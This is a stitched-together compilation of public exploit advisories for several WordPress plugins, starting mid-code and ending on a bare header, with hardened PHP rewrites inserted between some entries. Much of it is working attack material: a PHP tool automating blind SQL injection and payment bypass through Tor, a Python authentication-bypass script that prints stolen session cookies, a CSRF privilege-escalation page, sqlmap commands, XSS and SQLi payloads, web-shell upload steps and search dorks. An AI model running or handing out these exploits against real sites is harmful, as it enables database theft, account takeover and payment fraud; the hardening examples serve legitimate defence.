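    $ids = example_read_cart_cookie( isset( $_COOKIE['example_cart'] ) ? $_COOKIE['example_cart'] : '' );
    $new = isset( $_POST['prod_ID'] ) ? absint( $_POST['prod_ID'] ) : 0;
    if ( $new > 0 ) {
        $ids[] = $new;
    }
    $ids = array_values( array_unique( $ids ) );
    // json_encode() of an int list can never carry a class name back to the server.
    setcookie( 'example_cart', json_encode( $ids ), time() + 3 * DAY_IN_SECONDS, '/' );
    wp_send_json_success( $ids );
}
add_action( 'wp_ajax_example_add_to_cart', 'example_add_to_cart' );
add_action( 'wp_ajax_nopriv_example_add_to_cart', 'example_add_to_cart' );

// If legacy serialized cookies must still be accepted during a migration,
// PHP 7's unserialize( $raw, array( 'allowed_classes' => false ) ) turns any
// object into __PHP_Incomplete_Class instead of instantiating it; the JSON
// path above avoids the unserialize parser entirely.
```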
# Exploit Title: Wordpress Ultimate-Product-Catalog <= 3.9.8 (do_shortcode via ajax) Unsanitized shortcode attributes - Unauthenticated Blind SQL Injection
# Date: 2016-07-28
# Google Dork: "Index of /wp-content/plugins/ultimate-product-catalogue/"
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.EtoileWebDesign.com/ultimate-product-catalogue/
# Software Link:
# Version: <=3.9.8
# Tested on: windows 7 + firefox.
====================
DESCRIPTION
====================
A vulnerability has been discovered in the WordPress Ultimate Product Catalog plugin, affecting v3.9.8 and below (tested).
It is due to unsanitized parameters passed to the shortcode function `Insert_Product_Catalog` [ "product-catalogue" ]
located in `/Functions/Shortcodes.php` line 4:
function Insert_Product_Catalog($atts) {
    // Select the catalogue information from the database
    ...
    $Catalogue = $wpdb->get_row("SELECT * FROM $catalogues_table_name WHERE Catalogue_ID=" . $id);
    $CatalogueItems = $wpdb->get_results("SELECT * FROM $catalogue_items_table_name WHERE Catalogue_ID=" . $id . " ORDER BY Position");
    ...
    return $ProductString;
}
The $id parameter is extracted from $atts with the `extract` function. This can be exploited by creating shortcodes with
malicious attributes, but only by administrators, editors and authors. However, in file `/Functions/Process_Ajax.php` line 113...
function UPCP_Filter_Catalogue() {
$Path = ABSPATH . 'wp-load.php';
include_once($Path);
$id = $_POST['id']; <-- we can control this value!!
...
echo do_shortcode("[product-catalogue id='" . $id . "' only_inner='Yes' starting_layout='" . $start_layout . "' excluded_layouts='" . $exclude_layouts . "' current_page='" . $current_page . "' ajax_reload='" . $ajax_reload . "' ajax_url='" . $ajax_url . "' request_count='" . $request_count . "' category='" . $Category . "' subcategory='" . $SubCategory . "' tags='" . $Tags . "' custom_fields='" . $Custom_Fields . "' prod_name='" . $Prod_Name . "' min_price='" . $Min_Price . "' max_price='" . $Max_Price . "']");
}
This is interesting because that function calls `do_shortcode`, executing the shortcode 'product-catalogue'; as a result, this calls `Insert_Product_Catalog`, which
is where I found the SQLi. Now we need to find a place where `UPCP_Filter_Catalogue` is called, and in lines 138-139 I found...
...
add_action('wp_ajax_update_catalogue', 'UPCP_Filter_Catalogue');
add_action( 'wp_ajax_nopriv_update_catalogue', 'UPCP_Filter_Catalogue');
...
This means that we can execute that function with nothing more than a request to `/wp-admin/admin-ajax.php?action=update_catalogue`, sending the vulnerable $id parameter
with our custom payload. Note that the `wp_ajax_nopriv` prefix makes this vulnerability exploitable by unauthenticated users.
Example:
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue
POSTDATA: id=0+or+(our+custom+select+here)+--
An attacker can exploit this vulnerability and compromise all user records or take over control of the host machine.
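The two functions quoted above in a hardened form, as an added example rather than the plugin's own fix (the vendor's 3.9.9 changelog only says it switched to a prepared statement): the shortcode coerces `id` to an integer and binds it with `$wpdb->prepare()`, and the AJAX handler stops building shortcode text from raw `$_POST` values. Table names, the nonce action and the function names are assumptions.

```php
<?php
// Added example: hardened counterparts of Insert_Product_Catalog() and
// UPCP_Filter_Catalogue(). Assumes WordPress is loaded ($wpdb, absint(),
// shortcode_atts(), check_ajax_referer()); table names and the nonce action are assumptions.

function upcp_example_insert_product_catalog( $atts ) {
    global $wpdb;

    // shortcode_atts() supplies a default for every attribute, so 'id' is always
    // defined and extract() is no longer needed.
    $atts = shortcode_atts( array( 'id' => 0 ), $atts, 'product-catalogue' );

    // Catalogue_ID is an integer column: coerce the attribute before it reaches SQL.
    $id = absint( $atts['id'] );
    if ( 0 === $id ) {
        return '';
    }

    $catalogues_table_name      = $wpdb->prefix . 'upcp_catalogues';      // assumed name
    $catalogue_items_table_name = $wpdb->prefix . 'upcp_catalogue_items'; // assumed name

    // prepare() formats %d as an integer; the request value is never part of the SQL text.
    $catalogue = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$catalogues_table_name} WHERE Catalogue_ID = %d", $id )
    );
    $items = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$catalogue_items_table_name} WHERE Catalogue_ID = %d ORDER BY Position",
            $id
        )
    );
    if ( ! $catalogue ) {
        return '';
    }

    // Minimal rendering; the column name Catalogue_Name is assumed. Output is escaped.
    $product_string = '<div class="upcp-catalogue">' . esc_html( $catalogue->Catalogue_Name )
        . ' (' . count( $items ) . ' items)</div>';
    return $product_string;
}
add_shortcode( 'product-catalogue', 'upcp_example_insert_product_catalog' );

function upcp_example_filter_catalogue() {
    // The front-end filter page embeds this nonce; a request without it is refused.
    // Nonces also work for logged-out visitors, so the nopriv hook can stay.
    check_ajax_referer( 'upcp_filter_catalogue', 'nonce' ); // assumed action name

    // Never rebuild shortcode text from raw input: apart from the SQL problem, a
    // quote in $_POST['id'] would let the caller append attributes of its own.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;

    echo do_shortcode( '[product-catalogue id="' . $id . '" only_inner="Yes"]' );
    wp_die(); // end the AJAX response cleanly
}
add_action( 'wp_ajax_update_catalogue', 'upcp_example_filter_catalogue' );
add_action( 'wp_ajax_nopriv_update_catalogue', 'upcp_example_filter_catalogue' );
```

The `include_once` of `wp-load.php` in the original handler is unnecessary under `admin-ajax.php`, which has already bootstrapped WordPress; the example drops it. The other shortcode attributes the original interpolates (`starting_layout`, `category`, ...) need the same treatment: validate each against the set of values it may take before it is placed into the shortcode string.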
==============
POC
==============
-----------------
//REQUEST
------------------
POST /wordpress/wp-admin/admin-ajax.php?action=update_catalogue HTTP/1.1
Host: localhost
Content-Length: 21
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.8
Cookie:
id=1+OR+SLEEP(10)+--+
--------------------------
EXPLOITING WITH SQLMAP
------------------------
sqlmap --url="http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue" --data="id=1" --level=5 --risk=3 --technique=B -p id --dbs --dbms=mysql
(listing all available databases)
==================================
time-line
===================================
2016-07-28: reported to vendor.
2016-07-28: vendor released plugin version 3.9.9. saying in changelog "Minor ajax update to switch to a prepared statement".
2016-07-29: public disclosure.
===================================
# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox.
# Demo: https://youtu.be/FSRZlD3SVQc
====================
DESCRIPTION
====================
An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files into the WordPress upload directory if the plugin is the premium version and the remote
attacker has a specific account (contributor|editor|author|administrator) that can manage this plugin.
===================
STEPS TO REPRODUCE
===================
1.- Go to "Custom fields" tab and add a new custom field with "type" file.
2.- Go to "Products" tab, Now you can see a new field with that you added previously.
3.- Select your php shell and save the product.
4.- Go to uri "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.
================
Vulnerable code
================
Located in the `<upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check file extensions.
function UPCP_Handle_File_Upload($Field_Name) {
..
if (!is_user_logged_in()) {exit();}
/* Make sure that the file exists */
elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
$error = __('No file was uploaded here..', 'UPCP');
}
/* Move the file and store the URL to pass it onwards*/
else {
$msg .= $_FILES[$Field_Name]['name'];
//for security reason, we force to remove all uploaded file
$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
//create the uploads directory if it doesn't exist
if (!file_exists($target_path)) {
mkdir($target_path, 0777, true);
}
$target_path = $target_path . basename( $_FILES[$Field_Name]['name']);
if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
$error .= "There was an error uploading the file, please try again!";
}
...
}
?>
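A replacement upload handler, added here as an example and not taken from the plugin: it requires a capability and a nonce rather than only a login, checks the file's extension and sniffed content against an allowlist, and lets `wp_handle_upload()` choose a sanitized, unique name under the uploads directory. The capability, nonce action and allowed types are assumptions.

```php
<?php
// Added example (not the plugin's code): an allowlisted upload handler for the
// custom-field file type. Assumes WordPress is loaded; capability and nonce names
// are assumptions.

function upcp_example_handle_file_upload( $field_name ) {
    // Being logged in is not enough: tie the action to a capability and a nonce.
    if ( ! current_user_can( 'edit_posts' ) ) {
        return new WP_Error( 'upcp_forbidden', 'Insufficient permissions.' );
    }
    check_admin_referer( 'upcp_save_product' ); // assumed nonce action; dies on failure

    if ( empty( $_FILES[ $field_name ]['tmp_name'] )
        || ! is_uploaded_file( $_FILES[ $field_name ]['tmp_name'] ) ) {
        return new WP_Error( 'upcp_no_file', 'No file was uploaded.' );
    }

    // Allowlist of what a product attachment may be. Executable or active types
    // (php, phtml, html, svg, ...) are simply absent from the list.
    $allowed = array(
        'pdf'      => 'application/pdf',
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
    );

    // Check the extension *and* the sniffed content, not only the client-supplied name.
    $check = wp_check_filetype_and_ext(
        $_FILES[ $field_name ]['tmp_name'],
        $_FILES[ $field_name ]['name'],
        $allowed
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'upcp_bad_type', 'File type not permitted.' );
    }

    if ( ! function_exists( 'wp_handle_upload' ) ) {
        require_once ABSPATH . 'wp-admin/includes/file.php';
    }

    // wp_handle_upload() re-validates the type against $allowed, sanitizes the
    // file name (no path components, no odd characters) and stores the file
    // under the uploads directory with a unique name.
    $result = wp_handle_upload(
        $_FILES[ $field_name ],
        array( 'test_form' => false, 'mimes' => $allowed )
    );
    if ( isset( $result['error'] ) ) {
        return new WP_Error( 'upcp_upload_failed', $result['error'] );
    }
    return $result['url']; // the URL to store alongside the product
}
```

Independently of the plugin code, configure the web server so that nothing under `wp-content/uploads/` is executed as a script; the handler above prevents the upload, the server rule limits the damage if any other path lets a script file in.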
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
==========
time-line
==========
2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclosure
===================================
<!--
# Exploit Title: Wordpress Ultimate-Product-Catalog <=3.8.1 Privilege escalation
# Date: 2016-06-17
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.etoilewebdesign.com
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Software Link:
# Version: 3.8.1
# Tested on: windows 7 + Mozilla firefox.
# Demo: https://www.youtube.com/watch?v=m_qMZ2wIQPI
====================
DESCRIPTION
====================
In recent security research, a privilege escalation web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin <=v3.8.1.
The vulnerability allows remote attackers to take over control of the Ultimate Product Catalogue Plugin administration page if the plugin is the premium version and the remote attacker has a specific account (contributor|editor|author).
The privilege escalation web vulnerability is located in the `<upc-plugin-path>/Functions/Update_Admin-Databases.php` file.
Remote attackers are able to send crafted data in a POST request with the vulnerable 'access_role' parameter.
The security risk of the privilege escalation web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) score of 8.6.
Exploitation of the privilege escalation vulnerability requires low user interaction and a low-privilege web application user account.
Successful exploitation of the privilege escalation web vulnerability results in web application compromise.
For a security demonstration I made a proof of concept to show the vulnerability logged in as a contributor user.
==============
POC (html)
==============
-->
<html>
<body>
<script>
function submitRequest()
{
var access_role = "contributor"; //this is my type of profile (contributor|editor|author) to full admin acces!!
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/wordpress/wp-admin/admin-ajax.php?action=UPCP-options&Action=UPCP_UpdateOptions", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Accept-Language", "es-ES,es;q=0.8");
xhr.withCredentials = true;
var body = "color_scheme=Blue&product_links=Same&read_more=Yes&desc_count=240&sidebar_order=Normal&Details_Image=http%3A%2F%2F&filter_type=AJAX&case_insensitive_search=Yes&tag_logic=AND&product_search=name&contents_filter=Yes&maintain_filtering=Yes&Socialmedia%5B%5D=Blank&custom_product_page=No&product_inquiry_form=No&product_reviews=No&lightbox=No&products_per_page=1000000&pagination_location=Top&product_sort=Price_Name&cf_converion=No&access_role="+access_role
+"&pretty_links=No&xml_sitemap_url=&seo_option=None&seo_integration=Add&seo_title=%5Bpage-title%5D+%7C+%5Bproduct-name%5D&categories_label=&subcategories_label=&tags_label=&custom_fields_label=&sort_by_label=&price_ascending_label=&price_descending_label=&name_ascending_label=&name_descending_label=&product_name_search_label=&product_name_text_label=&details_label=&back_to_catalogue=&no_results_found_label=&products_pagination_label=&product_details_label=&additional_info_label=&contact_us_label=&related_products_label=&next_product_label=&previous_product_label=&Options_Submit=Save+Changes";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="I want more privileges!!" onclick="submitRequest();" />
</form>
</body>
</html>
<!--
================
Vulnerable code
================
Located in the `<upc-plugin-path>/Functions/Update_Admin-Databases.php` file:
function Update_UPCP_Options() {
global $Full_Version;
$InstallVersion = get_option("UPCP_First_Install_Version");
...
if ($Full_Version == "Yes" and isset($_POST['access_role'])) {update_option("UPCP_Access_Role", $_POST['access_role']);}
...
$update = __("Options have been succesfully updated.", 'UPCP');
return $update;
}
The function does not check capabilities...
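The same options update with the missing checks in place, added here as an example and not the vendor's fix: a capability test so that a contributor, editor or author request is refused, a nonce so that the cross-site POST in the PoC above is refused, and a check that the submitted role actually exists. The nonce action is an assumption; the option name and `$Full_Version` global follow the code quoted above.

```php
<?php
// Added example (not the plugin's code): Update_UPCP_Options() guarded by a
// capability check and a nonce. Assumes WordPress is loaded; the nonce action is
// an assumption.

function upcp_example_update_options() {
    global $Full_Version;

    // Only users who may manage the site's options can change who administers the
    // plugin. current_user_can() is the check the original omits; a contributor,
    // editor or author request ends here with a 403.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Reject forged cross-site requests: the nonce is only known to pages rendered
    // for this user, so the attacker-hosted form in the PoC cannot supply it.
    check_ajax_referer( 'upcp_update_options', 'nonce' ); // assumed action name

    if ( 'Yes' === $Full_Version && isset( $_POST['access_role'] ) ) {
        // Restrict the stored value to roles that exist on this site, so a crafted
        // value cannot be written into UPCP_Access_Role.
        $role = sanitize_key( wp_unslash( $_POST['access_role'] ) );
        if ( array_key_exists( $role, wp_roles()->roles ) ) {
            update_option( 'UPCP_Access_Role', $role );
        }
    }

    return __( 'Options have been successfully updated.', 'UPCP' );
}
```

The role stored in `UPCP_Access_Role` decides who sees the plugin's admin menu; the page that renders that menu should repeat the capability check rather than trust the option alone, so that a changed option can never grant more than the caller's WordPress role allows.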
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
============
REFERENCES
============
https://i0akinsec.wordpress.com/2016/06/17/wordpress-ultimate-product-catalog-3-8-1-privilege-escalation/
http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
https://wordpress.org/plugins/ultimate-product-catalogue/
https://wordpress.org/plugins/ultimate-product-catalogue/changelog/
Note: The vulnerability can be exploited only if the plugin is the full version.
An attacker does not need any particular account, but the administration menu item only appears when the attacker's
account is contributor, editor or author. When the legitimate UPCP administrator then requests the plugin administration page,
access is denied.
==================================
time-line
2015-10-08: vulnerability found
2016-06-17: reported to vendor
2016-06-17: Vendor has released a new version (3.8.)
2016-06-18: Public disclosure
===================================
-->
<?php
/**
* Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
* Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password"
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wpindeed.com/
* Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
* Version: 3.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
* Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function isTrue($sql){
global $curl, $options;
$levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
$data = array(
'action'=>'ihc_preview_user_listing',
'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'pay'){
$level = $options['l'];
for($i=$options['s']; $i<$options['e']; $i++){
//This is mental, no IP or Hash check!
echo "Paying Level $level to UserID: $i\n";
$data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
$curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
//echo $curl->getResponse();
}
}
if ($options['m'] == 'sql'){
$query = $options['s'];
echo "'Running' SQL Query: $query\n";
echo "Getting Length";
$max_length = 100;
//Well, it is messed up, can't use , (comma) in the query
//Binary search or divide et impera is possible with the BETWEEN operator
//Code it yourself :)
$len = 0;
for ($i=1;$i<$max_length;$i++){
$sql_len = "(select char_length( ($query) ) = $i )";
if (isTrue($sql_len)){
echo "\nLength found: $i\n";
$len = $i;
break;
} else {
echo ".";
}
}
if ($len !== 0 ){
echo "Reading char by char\nResponse:\n";
} else {
die("Failed getting length!\nAborting.\n\n");
}
$charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
for ($i=1;$i<$len;$i++){
$got = false;
for ($j=0;$j<strlen($charset);$j++){
$chr = $charset[$j];
$question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
if (isTrue($question)){
echo $charset[$j];
$got = true;
break;
}
}
if (!$got){
echo "?";
}
}
echo "\n\n";
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
return false;
}
if ($options['m'] == 'sql' && !isset($options['s'])) {
return false;
}
if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
return false;
}
if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
echo "In pay mode -s -e and -l must be numeric!\n";
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
[MODE] sql - Blind SQL Inject mode*
pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
*Note: You can't use , (comma) in the query.
Examples:
php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
php $argv[0] -t http://localhost/ --tor=yes -m pay -s 0 -e 1000 -l 1
Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
# Title: WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection
# Author: defensecode
# Date: 2018-06-12
# Software: WordPress Ultimate Form Builder Lite plugin
# Version: 1.3.7 and below
# The easiest way to reproduce the SQL injection vulnerability is to
# visit the provided URL while being logged in as administrator or
# another user that is authorized to access the plugin settings page.
# Users that do not have full administrative privileges could abuse the
# database access the vulnerability provides to either escalate their
# privileges or obtain and modify database contents they were not
# supposed to be able to.
# SQL injection
# Vulnerable Function: $wpdb->get_row()
# Vulnerable Variable: $_POST['entry_id']
# Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php
# Vulnerable POST body:
entry_id=ExploitCodeHere&_wpnonce=xxx&action=ufbl_get_entry_detail_action
# Disclosure Timeline
# 2018/06/01 Vulnerabilities discovered
# 2018/06/06 Vendor contacted
# 2018/06/08 Vendor responded
# 2018/06/12 Advisory released to the public
# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
'''
Requirements:
* Valid Admin/User Email Needs to be Known
* Social Media Login Form has to be Embedded in the Specified URL
'''
#!/usr/bin/python3
import requests
import urllib.parse
import json
import argparse
banner = r''' ____ ___ _____ _______________________________ .__ .__ __
| | \/ _ \\______ \______ \_ _____/__ _________ | | ____ |__|/ |_
| | / /_\ \| | _/| | _/| __)_\ \/ /\____ \| | / _ \| \ __\
| | / | \ | \| | \| \> < | |_> > |_( <_> ) || |
|______/\____|__ /______ /|______ /_______ /__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/ \/|__|
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
'''
class exploit(object):
def __init__(self, page, email):
self.page = page
self.sess = requests.Session()
self.email = email
self.nonce = False
def get_nonce(self):
try:
nonce_req = self.sess.get(self.page)
if nonce_req.text.find("data-nonce=") != -1:
self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
except Exception as e:
print("Nonce Error: {}".format(e))
def auth_bypass(self):
try:
schema = urllib.parse.urlparse(self.page)
resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
"action" : "uabb-lf-google-submit",
"name" : "raphaelrocks",
"email" : self.email,
"nonce" : self.nonce
})
if resp.status_code == 200:
print("Exploit Successful, Use the Cookies to Login: \n{}".format(
json.dumps(self.sess.cookies.get_dict(), indent=4)
))
except Exception as e:
print("Auth Bypass Error: {}".format(e))
def begin_exploit(self):
self.get_nonce()
if self.nonce:
print("Found Nonce: {}".format(self.nonce))
self.auth_bypass()
else:
print("Failed to Gather Nonce")
if __name__ == "__main__":
print(banner)
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
args = parser.parse_args()
ex = exploit(args.url, args.email)
ex.begin_exploit()
# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 29/11/2021
# Exploit Author: Mansi Singh
# Vendor Homepage: https://wordpress.org/plugins/typebot/
# Software Link: https://wordpress.org/plugins/typebot/
# Tested on Windows
# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea
How to reproduce vulnerability:
1. Install Latest WordPress
2. Install and activate Typebot Version 1.4.3
3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.
4. Enter JavaScript payload which is mentioned below
"><img src=x onerror=confirm(1)>
5. You will observe that the payload is stored in the database; when the same functionality is triggered again, the JavaScript payload executes and a pop-up appears.
# Title: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST['topic_id'] = <script>alert('mehran')</script>
=================================================================================
# Title: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
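The `sub_page` include rewritten so the request selects a view from a fixed list instead of naming a file, added here as an example and not Tutor's fix. The view names are assumptions; the `views/pages` directory follows the source quoted above.

```php
<?php
// Added example (not Tutor's code): allowlisted view inclusion with a path check
// as defence in depth. View names are assumptions.

function tutor_example_include_sub_page( $sub_page, $views_dir ) {
    // The only views this page may show; the request picks one, it cannot name one.
    $allowed = array( 'list', 'add_new_instructor', 'settings' ); // assumed names

    if ( ! in_array( $sub_page, $allowed, true ) ) {
        return false; // unknown value: show nothing rather than guess
    }

    // realpath() collapses any ../ segments and symlinks; the prefix test then
    // confirms the resolved file really lives inside the views directory.
    $base = realpath( $views_dir );
    $file = realpath( $base . DIRECTORY_SEPARATOR . $sub_page . '.php' );
    if ( false === $base || false === $file
        || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }

    include $file;
    return true;
}

// Caller: sanitize_key() reduces the parameter to [a-z0-9_-], which already rules
// out slashes, dots and null bytes before the allowlist is consulted.
$sub_page = isset( $_GET['sub_page'] ) ? sanitize_key( wp_unslash( $_GET['sub_page'] ) ) : '';
if ( '' !== $sub_page ) {
    tutor_example_include_sub_page( $sub_page, plugin_dir_path( __FILE__ ) . 'views/pages' );
}
```

The `file_exists()` test in the original is not a control: it only confirms that whatever path the request assembled is present on disk. The allowlist is the control; the `realpath()` prefix check exists so that a future edit to the list (say, a name containing a slash) cannot silently reopen the issue.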
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
